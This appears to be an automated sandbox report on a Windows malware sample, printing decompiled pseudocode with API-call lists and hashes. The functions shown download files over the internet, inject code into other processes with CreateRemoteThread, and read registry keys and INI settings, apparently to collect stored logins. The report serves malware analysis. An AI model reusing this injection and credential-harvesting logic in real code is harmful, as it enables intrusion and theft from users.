        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
        • String ID:
        • API String ID: 1572960351-0
        • Opcode ID: 29b020cf0e55934d69ef25c8ccda6bc3e7d883894e09ae0c867483f771e480d9
        • Instruction ID: 767ae8e146145c6531c1a412c3b787a599ec344bb90e70691746e2ead1a9bad0
        • Opcode Fuzzy Hash: 29b020cf0e55934d69ef25c8ccda6bc3e7d883894e09ae0c867483f771e480d9
        • Instruction Fuzzy Hash: 37219272508344ABC230ABA5DC0AFDB7B9CEFC4314F00492BBA59E7191DB74A515CBA6
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00412F48(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
        				char _v5;
        				long _v12;
        				struct _OVERLAPPED* _v16;
        				void* _v20;
        				long _v24;
        				void* _t28;
        				long _t37;
        				void* _t41;
        
        				_v5 = 0;
        				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
        				if(_t41 == 0xffffffff) {
        					L15:
        					return _v5;
        				}
        				_t28 = E004110D6(0x1000);
        				_v20 = _t28;
        				if(_t28 == 0) {
        					L13:
        					CloseHandle(_t41);
        					if(_v5 == 0) {
        						E0041621B(_a8);
        					}
        					goto L15;
        				}
        				_v16 = 0;
        				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
        					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
        						break;
        					}
        					if(_v12 == 0) {
        						FlushFileBuffers(_t41);
        						_v5 = 1;
        						break;
        					}
        					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
        						break;
        					}
        					_t37 = _v12;
        					if(_t37 != _v24) {
        						break;
        					}
        					_v16 = _v16 + _t37;
        					if(_v16 <= _a12) {
        						continue;
        					}
        					break;
        				}
        				E00411106(_v20);
        				goto L13;
        			}












        APIs
        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,00000000,?), ref: 00412F68
        • WaitForSingleObject.KERNEL32(?,00000000), ref: 00412F96
        • InternetReadFile.WININET(00001000,?,00001000,?), ref: 00412FB2
        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00412FCD
        • FlushFileBuffers.KERNEL32(00000000), ref: 00412FED
        • CloseHandle.KERNEL32(00000000), ref: 00413000
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
        • String ID:
        • API String ID: 3509176705-0
        • Opcode ID: 23325d92bdc62691a9ec2d4e26d23397b9da2a4af08ec94fc022dd4a73fab8da
        • Instruction ID: 0cc13833b9fae889fce273b242953054ebbd9d13bb13754fcb7d39e638d87504
        • Opcode Fuzzy Hash: 23325d92bdc62691a9ec2d4e26d23397b9da2a4af08ec94fc022dd4a73fab8da
        • Instruction Fuzzy Hash: 37219231904148BFDF119FA4CD84BEEBB75BB04345F10406AF511F21A1C3B58DA6AB28
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 74%
        			E004160D5(signed int __eax, void* __ecx, void** __esi, long _a4) {
        				intOrPtr _v8;
        				long _v12;
        				void* _t19;
        				void* _t20;
        				long _t22;
        				void* _t23;
        
        				_t33 = __esi;
        				asm("sbb eax, eax");
        				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
        				__esi[2] = _t19;
        				if(_t19 == 0xffffffff) {
        					L11:
        					_t20 = 0;
        				} else {
        					__imp__GetFileSizeEx(_t19,  &_v12);
        					if(_t19 == 0 || _v8 != 0) {
        						L10:
        						CloseHandle(_t33[2]);
        						goto L11;
        					} else {
        						_t22 = _v12;
        						__esi[1] = _t22;
        						if(_t22 != 0) {
        							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
        							 *__esi = _t23;
        							if(_t23 == 0) {
        								goto L10;
        							} else {
        								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
        									VirtualFree( *_t33, 0, 0x8000);
        									goto L10;
        								} else {
        									goto L5;
        								}
        							}
        						} else {
        							 *__esi = 0;
        							L5:
        							_t20 = 1;
        						}
        					}
        				}
        				return _t20;
        			}










        APIs
        • CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00407194,?,?,00000000), ref: 004160FA
        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000000), ref: 0041610D
        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00407194,?,?,00000000), ref: 00416135
        • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00407194,?,?,00000000), ref: 0041614D
        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00407194,?,?,00000000), ref: 00416167
        • CloseHandle.KERNEL32(?,?,?,?,?,00407194,?,?,00000000), ref: 00416170
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
        • String ID:
        • API String ID: 1974014688-0
        • Opcode ID: 6f3ed4aff5a9fbf0d2ae1d17149426a97925f748f7d498ad90c2d4712085782e
        • Instruction ID: 991d44a1bbe81340d5af1d4786159d8d8574690b5f5d58831c840edd2ba148e8
        • Opcode Fuzzy Hash: 6f3ed4aff5a9fbf0d2ae1d17149426a97925f748f7d498ad90c2d4712085782e
        • Instruction Fuzzy Hash: B811C475100200BFDB218F21CC49EBB7BB9EB55B00B11492DF996E61B1D374E880CB28
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 92%
        			E00417C8C(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
        				void* _t21;
        				int _t22;
        				signed int _t23;
        				struct HWND__* _t27;
        				char* _t31;
        
        				_t27 = _a4;
        				if(( *0x41e590 & 0x00000004) == 0 || E00406B23() == 0) {
        					L7:
        					return GetUpdateRgn(_t27, _a8, _a12);
        				} else {
        					_t31 = TlsGetValue( *0x41fe7c);
        					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
        						goto L7;
        					} else {
        						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
        						if(_a12 != 0) {
        							_t22 = SaveDC( *(_t31 + 8));
        							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
        							asm("sbb eax, eax");
        							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
        							RestoreDC( *(_t31 + 8), _t22);
        						}
        						 *_t31 = 1;
        						_t21 = 2;
        						return _t21;
        					}
        				}
        			}









        APIs
        • GetUpdateRgn.USER32 ref: 00417D14
          • Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B
        • TlsGetValue.KERNEL32 ref: 00417CAC
        • SetRectRgn.GDI32(?,?,?,?,?), ref: 00417CCC
        • SaveDC.GDI32 ref: 00417CDC
        • SendMessageW.USER32(?,00000014,?), ref: 00417CEC
        • RestoreDC.GDI32(?,00000000), ref: 00417CFE
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
        • String ID:
        • API String ID: 3142230470-0
        • Opcode ID: b6dea842841ea200ac5d72fbbddbb7675df32af042fbd8d8421f721a9c14a327
        • Instruction ID: 9643f0f25aa6e03bb5de02e0beff3b1c25364df8954d829a171a2ab27ad42d63
        • Opcode Fuzzy Hash: b6dea842841ea200ac5d72fbbddbb7675df32af042fbd8d8421f721a9c14a327
        • Instruction Fuzzy Hash: 00119A31004705AFCB225F60FD48FAABBB5FF08711F10892AFA8691671D7399490DB68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 86%
        			E0040CBF5(void* __ecx, long _a4, intOrPtr _a8) {
        				char _v5;
        				void* __edi;
        				void* __esi;
        				void* _t10;
        				void* _t14;
        				void* _t23;
        				void* _t25;
        				void* _t26;
        
        				_t21 = __ecx;
        				_push(__ecx);
        				_v5 = 0;
        				_t23 = OpenProcess(0x47a, 0, _a4);
        				_t28 = _t23;
        				if(_t23 != 0) {
        					_push(_t25);
        					_t10 = E00406A38(_t21, _t23, _t25, _t28, _a8, 0);
        					_t26 = _t10;
        					if(_t26 != 0) {
        						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x41e5a4 + E00407164, 0, 0, 0);
        						_a4 = _t14;
        						if(_t14 == 0) {
        							VirtualFreeEx(_t23, _t26, 0, 0x8000);
        						} else {
        							WaitForSingleObject(_t14, 0x2710);
        							CloseHandle(_a4);
        							_v5 = 1;
        						}
        					}
        					CloseHandle(_t23);
        				}
        				return _v5;
        			}












        APIs
        • OpenProcess.KERNEL32(0000047A,00000000,74B5F560,00000000,74B5F560,?,?,0040CDAD,?,?,00000000,?,74B5F560,00000000), ref: 0040CC09
        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00825708,00000000,00000000,00000000), ref: 0040CC37
        • WaitForSingleObject.KERNEL32(00000000,00002710,?,0040CDAD,?,?,00000000,?,74B5F560,00000000), ref: 0040CC4A
        • CloseHandle.KERNEL32(74B5F560,?,0040CDAD,?,?,00000000,?,74B5F560,00000000), ref: 0040CC53
        • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,0040CDAD,?,?,00000000,?,74B5F560,00000000), ref: 0040CC67
        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,0040CDAD,?,?,00000000,?,74B5F560,00000000), ref: 0040CC6E
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
        • String ID:
        • API String ID: 14861764-0
        • Opcode ID: d6d0b9c207e60d564cddc021523e77bd9ef861cde39fcc809f557f2628063155
        • Instruction ID: a2ba2c77e85f9073fc325a49aad7f1720fe9d129045ecfcb5b85ced238eaadfa
        • Opcode Fuzzy Hash: d6d0b9c207e60d564cddc021523e77bd9ef861cde39fcc809f557f2628063155
        • Instruction Fuzzy Hash: FC019EB2108148BFEB012BA5DDCCDAF3F6CDB8A394B004179FA06B6260C6794C458779
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00412CDA(signed int __eax, char* __ecx) {
        				short _v28;
        				char* _v32;
        				signed int _t5;
        				void* _t12;
        				void* _t14;
        				char* _t15;
        				void* _t18;
        
        				_t15 = __ecx;
        				_t5 = __eax;
        				if(__ecx == 0) {
        					_t15 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725";
        				}
        				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
        				if(_t14 == 0) {
        					L7:
        					return 0;
        				}
        				_t18 = 0;
        				do {
        					_t1 = _t18 + 0x41e00c; // 0x41e00c
        					_t2 = _t18 +  &E0041E008; // 0x2
        					InternetSetOptionA(_t14,  *_t2, _t1, 4);
        					_t18 = _t18 + 8;
        				} while (_t18 < 0x18);
        				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
        				if(_t12 == 0) {
        					InternetCloseHandle(_t14);
        					goto L7;
        				}
        				return _t12;
        			}











        APIs
        • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 00412CF1
        • InternetSetOptionA.WININET(00000000,00000002,0041E00C,00000004), ref: 00412D10
        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00412D2D
        • InternetCloseHandle.WININET(00000000), ref: 00412D39
        Strings
        • Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725, xrefs: 00412CE2, 00412CF0
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Internet$CloseConnectHandleOpenOption
        • String ID: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725
        • API String ID: 910987326-1481029682
        • Opcode ID: 5627bae8431e81c063dd5b7ff6de9326b9d61d2d441dcf590cb6ffabc8bdf702
        • Instruction ID: 3bf49a69015dc422e65a87719373eee5d0b366d2d2caf7c09ae33d9acccb90ca
        • Opcode Fuzzy Hash: 5627bae8431e81c063dd5b7ff6de9326b9d61d2d441dcf590cb6ffabc8bdf702
        • Instruction Fuzzy Hash: 7AF090722006107BE7215772AD8CDBB7E6DEBC9B59B140929FA86E2071D27588A0C77C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 54%
        			E0041314E() {
        				char _v8;
        				struct HINSTANCE__* _v12;
        				void* _v1036;
        				struct HINSTANCE__* _t13;
        				_Unknown_base(*)()* _t15;
        				char _t22;
        				void* _t28;
        
        				_t22 = 0;
        				_t13 = LoadLibraryA("urlmon.dll");
        				_v12 = _t13;
        				if(_t13 != 0) {
        					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
        					if(_t15 != 0) {
        						_push( &_v8);
        						_push( &_v1036);
        						_push(0);
        						_v8 = 0x3ff;
        						_v1036 = 0;
        						if( *_t15() == 0) {
        							if(_v8 > 0x3ff) {
        								_v8 = 0x3ff;
        							}
        							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
        							_t22 = E00411564( &_v1036 | 0xffffffff,  &_v1036);
        						}
        					}
        					FreeLibrary(_v12);
        				}
        				return _t22;
        			}











        APIs
        • LoadLibraryA.KERNEL32(urlmon.dll,?), ref: 0041315F
        • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00413172
        • FreeLibrary.KERNEL32(00000030), ref: 004131C4
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Library$AddressFreeLoadProc
        • String ID: ObtainUserAgentString$urlmon.dll
        • API String ID: 145871493-2685262326
        • Opcode ID: 853c15b51556f5003ab3f876cf445a5f51f48c10f98790f184ff3bcf9a5ff4f3
        • Instruction ID: 52984c0add2edbe58341470ab1e983cc86aa4a90ee0d49fb8c3f92f61a2a7f58
        • Opcode Fuzzy Hash: 853c15b51556f5003ab3f876cf445a5f51f48c10f98790f184ff3bcf9a5ff4f3
        • Instruction Fuzzy Hash: 610188B1901254BBCB119FE49D844DE7A78AB04711F1001BAE755F3290D6348F848B68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E0040B6A5(char* __ecx, void* __eflags) {
        				int _v8;
        				void* _v12;
        				signed int _v16;
        				char* _v20;
        				intOrPtr _v24;
        				int _v28;
        				intOrPtr _v32;
        				char _v36;
        				void* _v40;
        				intOrPtr _v44;
        				char* _v48;
        				char _v60;
        				char _v80;
        				char _v100;
        				char _v120;
        				char _v152;
        				char _v216;
        				char _v284;
        				short _v804;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t70;
        				int _t102;
        				int _t110;
        				int _t114;
        				void* _t115;
        				signed int _t117;
        				void* _t119;
        				intOrPtr _t121;
        				void* _t124;
        				intOrPtr _t127;
        				int _t134;
        				intOrPtr _t136;
        				char* _t138;
        				char* _t141;
        				signed int _t145;
        				void* _t146;
        				void* _t147;
        
        				_t129 = __ecx;
        				_t70 = E004110D6(0xc08);
        				_t127 = _t70;
        				_t134 = 0;
        				_v24 = _t127;
        				if(_t127 == 0) {
        					return _t70;
        				} else {
        					E0040CA33(0x83,  &_v216);
        					_t141 =  &_v284;
        					E0040CA33(0x84, _t141);
        					_v48 =  &_v216;
        					_v44 = _t141;
        					E004111B9( &_v36,  &_v36, 0, 8);
        					E0040CA33(0x85,  &_v120);
        					E0040CA33(0x86,  &_v100);
        					E0040CA33(0x87,  &_v60);
        					_t145 =  &_v80;
        					E0040CA33(0x88, _t145);
        					_t12 = _t127 + 0x3fc; // 0x3fc
        					_v20 = _t12;
        					_v16 = 0;
        					do {
        						if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) {
        							goto L22;
        						}
        						_v28 = _t134;
        						_v8 = 0x104;
        						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
        							L21:
        							RegCloseKey(_v12);
        							goto L22;
        						} else {
        							goto L4;
        						}
        						do {
        							L4:
        							_t136 = _v24;
        							_v28 = _v28 + 1;
        							_t102 = E004150D3(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
        							_t145 = _t145 | 0xffffffff;
        							_v8 = _t102;
        							if(_t102 != _t145 && _t102 != 0) {
        								_t137 = _t136 + 0x1fe;
        								_t110 = E004150D3(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
        								_v8 = _t110;
        								if(_t110 == _t145 || _t110 == 0) {
        									_t114 = E004150D3(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
        									_v8 = _t114;
        									if(_t114 == _t145 || _t114 == 0) {
        										goto L19;
        									} else {
        										goto L10;
        									}
        								} else {
        									L10:
        									_t115 = _v12;
        									_t129 =  &_v804;
        									_v40 = _t115;
        									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) {
        										_t117 = _t145;
        									} else {
        										_t145 =  &_v40;
        										_t117 = E004151FB(_t145,  &_v80, _t116, _v20, 0xff);
        									}
        									_v8 = _t117;
        									if(_t117 != 0xffffffff && _t117 != 0) {
        										_t138 = _v20;
        										if(E0040B64B(_t138) > 0) {
        											_t145 =  &_v152;
        											_t119 = 0x56;
        											E0040CA33(_t119, _t145);
        											_t121 = _v24;
        											_push(_t121);
        											_t129 = _t138;
        											_push(_t129);
        											_push(_t121 + 0x1fe);
        											_t51 = _t129 + 0x1fe; // 0x201
        											_t124 = E00411DF9(_t145, 0x307, _t51, _t145);
        											_t147 = _t147 + 0x10;
        											if(_t124 > 0) {
        												_t129 =  &_v36;
        												if(E004114FA(_t124,  &_v36, _v20 + 0x1fe) != 0) {
        													_v32 = _v32 + 1;
        												}
        											}
        										}
        									}
        									goto L19;
        								}
        							}
        							L19:
        							_v8 = 0x104;
        						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
        						_t134 = 0;
        						goto L21;
        						L22:
        						_v16 = _v16 + 1;
        					} while (_v16 < 2);
        					E00411106(_v24);
        					if(_v32 <= _t134) {
        						return E00411106(_v36);
        					}
        					return E004095BC(0x307, _v36, 0xcb);
        				}
        			}










































        APIs
        • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,00000003,?,00000000,00000008,?,00000000), ref: 0040B75C
        • RegEnumKeyExW.ADVAPI32(00000003,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040B787
        • RegCloseKey.ADVAPI32(00000003,?,00000000), ref: 0040B8DD
          • Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8
        • RegEnumKeyExW.ADVAPI32(00000003,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000), ref: 0040B8CA
          • Part of subcall function 004150D3: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407A8E,?,?,00000104), ref: 00415169
        • RegOpenKeyExW.ADVAPI32(00000003,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF,?,00000000), ref: 0040B827
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Open$Enum$CloseEnvironmentExpandStrings
        • String ID:
        • API String ID: 2343474859-0
        • Opcode ID: 7bb4c856288b58a0bce8df277c0f625b1c3759c389c5f5d978419ef1c0a1891f
        • Instruction ID: 62d81f5d220e74f88abece2aee467ed304837e34b4cbb7ff47f66c112ff9e10e
        • Opcode Fuzzy Hash: 7bb4c856288b58a0bce8df277c0f625b1c3759c389c5f5d978419ef1c0a1891f
        • Instruction Fuzzy Hash: 8671FB72D00119ABDB11EBA5CD45AEFB7BCEF48304F14417AF605F32A1D7389A458BA8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 94%
        			E0040A76B(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
        				short _v524;
        				char _v564;
        				short _v576;
        				short _v588;
        				short _v600;
        				short _v608;
        				WCHAR* _v612;
        				WCHAR* _v616;
        				WCHAR* _v620;
        				WCHAR* _v624;
        				WCHAR* _v628;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				WCHAR* _t51;
        				WCHAR* _t54;
        				WCHAR* _t56;
        				void* _t57;
        				void* _t59;
        				void* _t61;
        				void* _t63;
        				long _t67;
        				WCHAR* _t69;
        				long _t77;
        				long _t80;
        				WCHAR* _t82;
        				void* _t83;
        				WCHAR* _t86;
        				WCHAR* _t87;
        				short* _t92;
        				WCHAR* _t93;
        				int _t102;
        				WCHAR* _t107;
        				intOrPtr _t114;
        				signed int _t115;
        				void* _t117;
        
        				_t117 = (_t115 & 0xfffffff8) - 0x26c;
        				if(E00416745( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
        					L19:
        					return 1;
        				}
        				_t120 =  *__edx & 0x00000010;
        				if(( *__edx & 0x00000010) == 0) {
        					_t107 = E004110D6(0x1fffe);
        					_v612 = _t107;
        					__eflags = _t107;
        					if(_t107 == 0) {
        						goto L19;
        					}
        					_t51 = GetPrivateProfileStringW(0, 0, 0, _t107, 0xffff,  &_v524);
        					__eflags = _t51;
        					if(_t51 == 0) {
        						L18:
        						E00411106(_t107);
        						goto L19;
        					}
        					_t9 =  &(_t51[0]); // 0x1
        					_t54 = E00411FB6(_t107, _t9);
        					__eflags = _t54;
        					if(_t54 == 0) {
        						goto L18;
        					}
        					_t56 = E004110D6(0xc1c);
        					_v620 = _t56;
        					__eflags = _t56;
        					if(_t56 != 0) {
        						_t11 =  &(_t56[0xff]); // 0x1fe
        						_t92 = _t11;
        						_v624 = _t107;
        						_v616 = _t92;
        						_t57 = 0x5c;
        						_t93 =  &(_t92[0xff]);
        						__eflags = _t93;
        						E0040CA33(_t57,  &_v608);
        						_t59 = 0x5d;
        						E0040CA33(_t59,  &_v588);
        						_t61 = 0x5e;
        						E0040CA33(_t61,  &_v576);
        						_t63 = 0x5f;
        						E0040CA33(_t63,  &_v600);
        						do {
        							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
        							__eflags = _t67;
        							if(_t67 != 0) {
        								_t102 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524);
        								_t25 = _t102 - 1; // -1
        								__eflags = _t25 - 0xfffe;
        								if(_t25 <= 0xfffe) {
        									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
        									__eflags = _t77;
        									if(_t77 != 0) {
        										_t80 = GetPrivateProfileStringW(_v624,  &_v600, 0, _t93, 0xff,  &_v524);
        										__eflags = _t80;
        										if(_t80 != 0) {
        											_t82 = E0040A65E(_v624, _t93);
        											__eflags = _t82;
        											if(_t82 > 0) {
        												_t113 =  &_v564;
        												_t83 = 0x55;
        												E0040CA33(_t83,  &_v564);
        												_push(_t102);
        												_push(_v620);
        												_push(_t93);
        												_push(_v616);
        												_t37 =  &(_t93[0xff]); // 0x1fe
        												_t103 = _t37;
        												_t86 = E00411DF9(_t113, 0x311, _t37, _t113);
        												_t117 = _t117 + 0x14;
        												__eflags = _t86;
        												if(_t86 > 0) {
        													_t114 = _a4;
        													_t87 = E004114FA(_t86, _t114, _t103);
        													__eflags = _t87;
        													if(_t87 != 0) {
        														_t39 = _t114 + 4;
        														 *_t39 =  &(( *(_t114 + 4))[0]);
        														__eflags =  *_t39;
        													}
        												}
        											}
        										}
        									}
        								}
        							}
        							_t69 = E00411FF2(_v624, 1);
        							_v628 = _t69;
        							__eflags = _t69;
        						} while (_t69 != 0);
        						E00411106(_v620);
        						_t107 = _v616;
        					}
        					goto L18;
        				} else {
        					E0040A711(_t120,  &_v524, _a4);
        					goto L19;
        				}
        			}

        APIs
          • Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764
        • GetPrivateProfileStringW.KERNEL32 ref: 0040A7D2
        • GetPrivateProfileStringW.KERNEL32 ref: 0040A866
        • GetPrivateProfileIntW.KERNEL32 ref: 0040A884
        • GetPrivateProfileStringW.KERNEL32 ref: 0040A8AF
        • GetPrivateProfileStringW.KERNEL32 ref: 0040A8CB
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: PrivateProfile$String$CombinePath
        • String ID:
        • API String ID: 2134968610-0
        • Opcode ID: 927d9cb43296edb38ff9f7b3798621854bf2451ad09c5f4964ad00fdedf078b9
        • Instruction ID: e661de6012880e7b285b7bc4b6f38da2fa93c0ced890862ad578e7c9886cdfe8
        • Opcode Fuzzy Hash: 927d9cb43296edb38ff9f7b3798621854bf2451ad09c5f4964ad00fdedf078b9
        • Instruction Fuzzy Hash: 3F51B371604305ABD710DF61CC41FABB7E8FF84754F00093ABA84A72E1D739DA458B96
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 96%
        			E00416D90(void* __ecx, signed int __edx, void** __esi, long _a4) {
        				char _v5;
        				void _v16;
        				struct _OVERLAPPED* _v24;
        				struct _OVERLAPPED* _v28;
        				signed int _v32;
        				signed int _v36;
        				void* _t29;
        				signed int _t31;
        				int _t38;
        				int _t39;
        				signed int _t41;
        				int _t42;
        				int _t45;
        				intOrPtr _t48;
        				void* _t49;
        				signed int _t53;
        				struct _OVERLAPPED* _t54;
        				void** _t56;
        
        				_t56 = __esi;
        				_t53 = __edx;
        				_t49 = __ecx;
        				_t54 = 0;
        				_v5 = 0;
        				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
        				 *__esi = _t29;
        				if(_t29 != 0xffffffff) {
        					_t31 = E004161F4(_t49, _t29);
        					_v36 = _t31;
        					_v32 = _t53;
        					if((_t31 & _t53) == 0xffffffff) {
        						L4:
        						CloseHandle( *_t56);
        						 *_t56 =  *_t56 | 0xffffffff;
        					} else {
        						if((_t31 | _t53) == 0) {
        							L18:
        							_t56[2] = _t56[2] | 0xffffffff;
        							_t25 =  &(_t56[3]);
        							 *_t25 = _t56[3] | 0xffffffff;
        							__eflags =  *_t25;
        							_v5 = 1;
        							E004161A4( *_t56, _t54, _t54, _t54);
        						} else {
        							_v28 = 0;
        							_v24 = 0;
        							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
        								while(1) {
        									__eflags = _a4 - _t54;
        									if(_a4 == _t54) {
        										goto L18;
        									}
        									__eflags = _a4 - 5;
        									if(_a4 != 5) {
        										L16:
        										_t38 = E004161A4( *_t56, _v28, _v24, _t54);
        										__eflags = _t38;
        										if(_t38 == 0) {
        											goto L4;
        										} else {
        											_t39 = SetEndOfFile( *_t56);
        											__eflags = _t39;
        											if(_t39 == 0) {
        												goto L4;
        											} else {
        												goto L18;
        											}
        										}
        									} else {
        										_t41 = _v16 ^ _t56[4];
        										asm("adc edi, [ebp-0x14]");
        										_t48 = _t41 + _v28 + 5;
        										asm("adc edi, ecx");
        										_v16 = _t41;
        										__eflags = 0 - _v32;
        										if(__eflags > 0) {
        											L15:
        											_t54 = 0;
        											__eflags = 0;
        											goto L16;
        										} else {
        											if(__eflags < 0) {
        												L11:
        												__eflags = _t41 - 0xa00000;
        												if(_t41 > 0xa00000) {
        													goto L15;
        												} else {
        													_t42 = E004161A4( *_t56, _t41, 0, 1);
        													__eflags = _t42;
        													if(_t42 == 0) {
        														goto L4;
        													} else {
        														_v28 = _t48;
        														_v24 = 0;
        														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
        														__eflags = _t45;
        														if(_t45 != 0) {
        															_t54 = 0;
        															__eflags = 0;
        															continue;
        														} else {
        															goto L4;
        														}
        													}
        												}
        											} else {
        												__eflags = _t48 - _v36;
        												if(_t48 > _v36) {
        													goto L15;
        												} else {
        													goto L11;
        												}
        											}
        										}
        									}
        									goto L19;
        								}
        								goto L18;
        							} else {
        								goto L4;
        							}
        						}
        					}
        				}
        				L19:
        				return _v5;
        			}

        APIs
